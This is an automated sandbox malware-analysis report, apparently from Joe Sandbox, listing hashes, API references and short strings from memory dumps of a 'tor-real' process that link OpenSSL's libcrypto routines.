                                                                            • Instruction Fuzzy Hash: 12F0F8756483048FC340AF69D49079EB7F0EB8D318F948D2DE49897700C734E9468B86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID:
                                                                            • API String ID: 1475443563-3916222277
                                                                            • Opcode ID: a1831c664674f6a77035655b32b4fbef6847fac7e8ef1cb292f192e8759e7b25
                                                                            • Instruction ID: 9f7c94d50e6ae936e27eec9fd44add8fabe47c0747f45453187cf759650c56b1
                                                                            • Opcode Fuzzy Hash: a1831c664674f6a77035655b32b4fbef6847fac7e8ef1cb292f192e8759e7b25
                                                                            • Instruction Fuzzy Hash: A781C4746083458FD710CF29C580B8ABBE5BF89308F56CA6DE8A88B711D734E945CF52
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0C6CC4
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0C6D0E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numL_sk_value
                                                                            • String ID: 2
                                                                            • API String ID: 557030205-450215437
                                                                            • Opcode ID: b10ac91ec760a6934b49e00f5b1ff6e2a2a4838f3d1984202994485160b78cc3
                                                                            • Instruction ID: 057a30f8b91e43929bd9246c5bd538971959216059855249bf0d4abcbb722213
                                                                            • Opcode Fuzzy Hash: b10ac91ec760a6934b49e00f5b1ff6e2a2a4838f3d1984202994485160b78cc3
                                                                            • Instruction Fuzzy Hash: BE4135B1A093048BC720DF69D58572EBBE0FF89708F14896DE4889B710E775E949CB82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: n$n
                                                                            • API String ID: 0-3874132673
                                                                            • Opcode ID: f7a958f84cd04afd00c690b56b017f0745ddd243697bfa817e9f795a50ecdd66
                                                                            • Instruction ID: 0aeb87eca298f822dcc966044d652a6f48ce93abdea659b6562450f34d7f08a7
                                                                            • Opcode Fuzzy Hash: f7a958f84cd04afd00c690b56b017f0745ddd243697bfa817e9f795a50ecdd66
                                                                            • Instruction Fuzzy Hash: 5241F1786093019BD720CF29C58471EBBE1BBC8758F208A2DE8A987764E775D844DF82
                                                                            APIs
                                                                              • Part of subcall function 6C094E20: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094E65
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeO_zallocR_put_error
                                                                            • String ID: D
                                                                            • API String ID: 661623873-2746444292
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0C4497
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0C44AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numL_sk_value
                                                                            • String ID: /
                                                                            • API String ID: 557030205-2043925204
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA6DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 1208671065-307317852
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B6770
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 1767461275-3554254475
                                                                            APIs
                                                                              • Part of subcall function 6C0D8600: OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,6C0BE5B6), ref: 6C0D8621
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0BE5BF
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_num$O_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 621194475-307317852
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA6DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            APIs
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            • d2i_X509.LIBCRYPTO-1_1 ref: 6C0CEBBE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_pop_freeX509X509_freed2i_
                                                                            • String ID: 2
                                                                            • API String ID: 1007395192-450215437
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: P
                                                                            • API String ID: 177401054-3110715001
                                                                            • Opcode ID: 4fed300640524977cd58242a88ae7c42aa1860fcf11c3859a7ada9d230a608b0
                                                                            • Instruction ID: 8bc9c2a1d971cf56f4770a143127a6f07ba2e790682f6c7ca89e67cbacaa6d06
                                                                            • Opcode Fuzzy Hash: 4fed300640524977cd58242a88ae7c42aa1860fcf11c3859a7ada9d230a608b0
                                                                            • Instruction Fuzzy Hash: ED113A716053158FDB008F58C48839EBBE0BF88348F61891CE9A817740C37AD448DF57
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /$ssl/d1_lib.c
                                                                            • API String ID: 0-2993022000
                                                                            • Opcode ID: 9caf25a5cb32b19c04b99fe890f98924260c824f447ec75063b45cfed9fe2fc4
                                                                            • Instruction ID: eee5b55de298a5f58bfde23fd68368a57b2a861edfa20e1551af6bc7448548a3
                                                                            • Opcode Fuzzy Hash: 9caf25a5cb32b19c04b99fe890f98924260c824f447ec75063b45cfed9fe2fc4
                                                                            • Instruction Fuzzy Hash: 29113AB01093069BD344DF25C88438EBBE1BB85318F54DA7CE4988BB85C73495899F82
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA497
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: D
                                                                            • API String ID: 177401054-2746444292
                                                                            • Opcode ID: 65603799fa405fc512c01c99a3183921888baf3c21349fccb7b1ed6afd15dfc0
                                                                            • Instruction ID: 3d201f4393892792101718ef59ef0b1905b151d56aa3ba91b6f4743ea29e76b7
                                                                            • Opcode Fuzzy Hash: 65603799fa405fc512c01c99a3183921888baf3c21349fccb7b1ed6afd15dfc0
                                                                            • Instruction Fuzzy Hash: 23113AB16097158FD7008F58C48839EBBE0BF89358F618A1CE9A85B740C37AE449DF87
                                                                            APIs
                                                                            • BUF_MEM_free.LIBCRYPTO-1_1 ref: 6C0CA28A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CABFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: M_freeR_put_error
                                                                            • String ID: D
                                                                            • API String ID: 177401054-2746444292
                                                                            • Opcode ID: 6652e3af4ddab9f67974c60f0bf991db0c022bef5dad64d9c0f068834ff59e40
                                                                            • Instruction ID: 39135b6cfb2707f484f409cf51c28975abef646e83a889c84fc25dffb3bc75b5
                                                                            • Opcode Fuzzy Hash: 6652e3af4ddab9f67974c60f0bf991db0c022bef5dad64d9c0f068834ff59e40
                                                                            • Instruction Fuzzy Hash: 810113B16097058FD7008F59C48479EBBE0BF89718F618A1CE9A85B680C37AD4488B87
                                                                            APIs
                                                                            • CONF_parse_list.LIBCRYPTO-1_1 ref: 6C0E2A86
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0E2ACC
                                                                              • Part of subcall function 6C0E28F0: CRYPTO_malloc.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E291B
                                                                              • Part of subcall function 6C0E28F0: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,6C0E2AB4), ref: 6C0E2980
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: F_parse_listO_freeO_malloc__stack_chk_fail
                                                                            • String ID: :
                                                                            • API String ID: 202213309-336475711
                                                                            • Opcode ID: 614e2edee8cc935e14e1c495a16c639c503b92fb5afbe5b99a4f1c9efaf7b50d
                                                                            • Instruction ID: b060367c3a1dfe70a7eea7145a220b27b30054b7b0ff1689c3acbfbce3160fda
                                                                            • Opcode Fuzzy Hash: 614e2edee8cc935e14e1c495a16c639c503b92fb5afbe5b99a4f1c9efaf7b50d
                                                                            • Instruction Fuzzy Hash: 7F11F3716183558FE720DF25C58479BBBE4BF88308F05892DE8D897300D774A508CF92
                                                                            APIs
                                                                            • ERR_add_error_data.LIBCRYPTO-1_1 ref: 6C0B838F
                                                                              • Part of subcall function 6C0AC590: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5C1
                                                                              • Part of subcall function 6C0AC590: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC5E0
                                                                              • Part of subcall function 6C0AC590: OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0AC5F3
                                                                              • Part of subcall function 6C0AC590: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AC60B
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B843F
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0B8449
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$L_sk_pop_freeR_add_error_dataR_put_error__stack_chk_fail
                                                                            • String ID: H
                                                                            • API String ID: 1593245253-2852464175
                                                                            • Opcode ID: 5a1fa16e01c3be3459e996516ea236c62468145dd9df73944090db81f90540d0
                                                                            • Instruction ID: 4fd03ab0cde929a5be1cb8c1cc2af3a844bae200cf71d90751ad4b7c47c5f590
                                                                            • Opcode Fuzzy Hash: 5a1fa16e01c3be3459e996516ea236c62468145dd9df73944090db81f90540d0
                                                                            • Instruction Fuzzy Hash: 1201C0B5608301DFC310DFA8C08174EFBE0BB88719F108D1EE0D8A7A20D7B9E5488B86
                                                                            APIs
                                                                            • EVP_MD_size.LIBCRYPTO-1_1 ref: 6C0C2F63
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_sizeO_zalloc
                                                                            • String ID: D$P
                                                                            • API String ID: 95341914-307317852
                                                                            • Opcode ID: e9c71d90b40351983438706acd2e58c4c12eaf61d86f80c845f30096d7cfc977
                                                                            • Instruction ID: 66671bc5658649a30ab68000474983e34dc697f3a6760dc5e9a2b8657843e272
                                                                            • Opcode Fuzzy Hash: e9c71d90b40351983438706acd2e58c4c12eaf61d86f80c845f30096d7cfc977
                                                                            • Instruction Fuzzy Hash: 1301F2B02097019EE700AF25D58936FBBF0BB84708F10991DE5984BA40DBB994499B83
                                                                            APIs
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0680
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestR_put_errorUpdate
                                                                            • String ID: D$P
                                                                            • API String ID: 1495512078-307317852
                                                                            • Opcode ID: 6ab562742c5dc92f355c86829a847516a25cd8a6cb50b01614f4840e90ede6c4
                                                                            • Instruction ID: b8a2320f382d6780abf1d640b8791f4fd89afb6864e5090ce2be09da98b30e5c
                                                                            • Opcode Fuzzy Hash: 6ab562742c5dc92f355c86829a847516a25cd8a6cb50b01614f4840e90ede6c4
                                                                            • Instruction Fuzzy Hash: 27F0E2B160C7508FD340DFA8D48478BFBF0AB88358F85891EE9A997611D374E8498B82
                                                                            APIs
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4745
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A4C4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N1_item_freeR_put_error
                                                                            • String ID: g
                                                                            • API String ID: 4156053322-30677878
                                                                            • Opcode ID: b223fa1234dffaf0d316395b9d2a513d279ad1c4ceab3ed8635578a61eb83cd5
                                                                            • Instruction ID: 5c68988424162ce01300d867156b12e9e07fd6c57fd3de8625bcab9431b6dfdf
                                                                            • Opcode Fuzzy Hash: b223fa1234dffaf0d316395b9d2a513d279ad1c4ceab3ed8635578a61eb83cd5
                                                                            • Instruction Fuzzy Hash: FFF03AB6109341AFDB009FD5D48039EF7E0FF81708F01992DE5E81BA00C7B5A5498F96
                                                                            APIs
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0ED1
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C0E0F83
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0FAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: CipherInit_exR_flagsX_ctrl
                                                                            • String ID: D
                                                                            • API String ID: 3413411502-2746444292
                                                                            • Opcode ID: cc67cc2f9e8c11d9bef6432798bbb551ae8396b492cb3aab0de73392d453c1d8
                                                                            • Instruction ID: 8d8447a508a755b1ce2b02eb02fce36a505fd18ee5cb831b353cc241b4ef7de3
                                                                            • Opcode Fuzzy Hash: cc67cc2f9e8c11d9bef6432798bbb551ae8396b492cb3aab0de73392d453c1d8
                                                                            • Instruction Fuzzy Hash: BF0188B05493019FE300CF28C18470ABBE0AB89308F008C1DE9A8A7740E779E9489F86
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0C4497
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0C44AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_numL_sk_value
                                                                            • String ID: 2
                                                                            • API String ID: 557030205-450215437
                                                                            • Opcode ID: 39dbab7cf3ce6f667aca7f31557d4fecc17117418ab79dbc725185877c96c5ae
                                                                            • Instruction ID: 06a71238d609000556b576912921028831ce8937d91b49efc003204aa95052ef
                                                                            • Opcode Fuzzy Hash: 39dbab7cf3ce6f667aca7f31557d4fecc17117418ab79dbc725185877c96c5ae
                                                                            • Instruction Fuzzy Hash: 38F058B160A3019FD300AF60E54429EFBF1FB84719F22891EE48847711D7BAA488CF83
                                                                            APIs
                                                                            • ASN1_item_free.LIBCRYPTO-1_1 ref: 6C0A4745
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A47D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: N1_item_freeR_put_error
                                                                            • String ID: g
                                                                            • API String ID: 4156053322-30677878
                                                                            • Opcode ID: 9d88223f193ef0258e0a11be163f4a5ba3285d02da135cc836d32f064ded2f41
                                                                            • Instruction ID: 7ed151613fd288cdaa54b830f15a410bf2e6b677543172c16b50e0fbb5244c4b
                                                                            • Opcode Fuzzy Hash: 9d88223f193ef0258e0a11be163f4a5ba3285d02da135cc836d32f064ded2f41
                                                                            • Instruction Fuzzy Hash: ABF034B6109341AFDB10AFD5D48039EF7F0FF81708F01992DE5A81BA10C7B9A54A8F96
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0CEB04
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0CEB14
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0CF08E
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CF0AE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_pop_freeO_freeR_put_errorX509_free__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 826722838-450215437
                                                                            • Opcode ID: 0a723b1a56103af8aa8d49724bef4b387c310ce5fc56b8c238366e3c412d6679
                                                                            • Instruction ID: 660ccae3c831853611a4b1e2846b27b5ac5a0f4a73f51669e80559378ef305fd
                                                                            • Opcode Fuzzy Hash: 0a723b1a56103af8aa8d49724bef4b387c310ce5fc56b8c238366e3c412d6679
                                                                            • Instruction Fuzzy Hash: B7F0F8B16497008FD304AF65D98139EFBF0FB8A758F90882DE0D857640CB79A50A9F87
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0D84ED
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0D84F5
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0D85FB
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,6C0BE5B6), ref: 6C0D8621
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: E_freeL_sk_numL_sk_pop_freeR_put_errorX509___stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 1899696362-450215437
                                                                            • Opcode ID: 9947369612585f70d6d975a9805d57397a16c2a049868f1dc8ab9d8231e1c260
                                                                            • Instruction ID: 95abea9250945e579aedb0247ceebc01afd25fdbeda658f9fb8b1026225504e2
                                                                            • Opcode Fuzzy Hash: 9947369612585f70d6d975a9805d57397a16c2a049868f1dc8ab9d8231e1c260
                                                                            • Instruction Fuzzy Hash: 54F0D4B21487048EC340AF55D04536EFBF0FF88758F52890EE1D957650C779A149DB87
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0A0869
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A0A05
                                                                            • EVP_MD_CTX_new.LIBCRYPTO-1_1 ref: 6C0A0A56
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0A0A88
                                                                            • strlen.MSVCRT ref: 6C0A0AA3
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0AB7
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0ADA
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0AFF
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0B24
                                                                            • EVP_DigestFinal_ex.LIBCRYPTO-1_1 ref: 6C0A0B40
                                                                            • EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0A0B68
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0B8B
                                                                            • EVP_DigestUpdate.LIBCRYPTO-1_1 ref: 6C0A0BA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Digest$Update$Init_ex$Final_exR_put_errorX_freeX_new__stack_chk_failstrlen
                                                                            • String ID: D$P
                                                                            • API String ID: 333687674-307317852
                                                                            • Opcode ID: bf74b6505c2d807eb0e6821be56d70f1574459b8b0bc838d3e8aa8b4cb8610dd
                                                                            • Instruction ID: a6af8e564226aef575fde2c456fc1621fd9f891718b2f163ab0447c822fb434b
                                                                            • Opcode Fuzzy Hash: bf74b6505c2d807eb0e6821be56d70f1574459b8b0bc838d3e8aa8b4cb8610dd
                                                                            • Instruction Fuzzy Hash: 40F0D4B15087048FC740DFA4D88139BBBF0FB8435CF01891DE1A957640C774A549CF82
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0D84ED
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0D84F5
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0D85FB
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,6C0BE5B6), ref: 6C0D8621
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: E_freeL_sk_numL_sk_pop_freeR_put_errorX509___stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 1899696362-450215437
                                                                            • Opcode ID: 551d9061be515ab389bf95ea3042e9e9da62293e8f905f09686790ccd9d59fea
                                                                            • Instruction ID: f7c7e6b6c63025dccb20f30b7b595f21983ee23553ea0c53c56f4e5beb78175c
                                                                            • Opcode Fuzzy Hash: 551d9061be515ab389bf95ea3042e9e9da62293e8f905f09686790ccd9d59fea
                                                                            • Instruction Fuzzy Hash: A0F0D4B21487049EC340AF51D04536EFBF0FF88758F52890EE1D957640C775A049DB87
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B299F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B29CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error
                                                                            • String ID: A
                                                                            • API String ID: 1767461275-3554254475
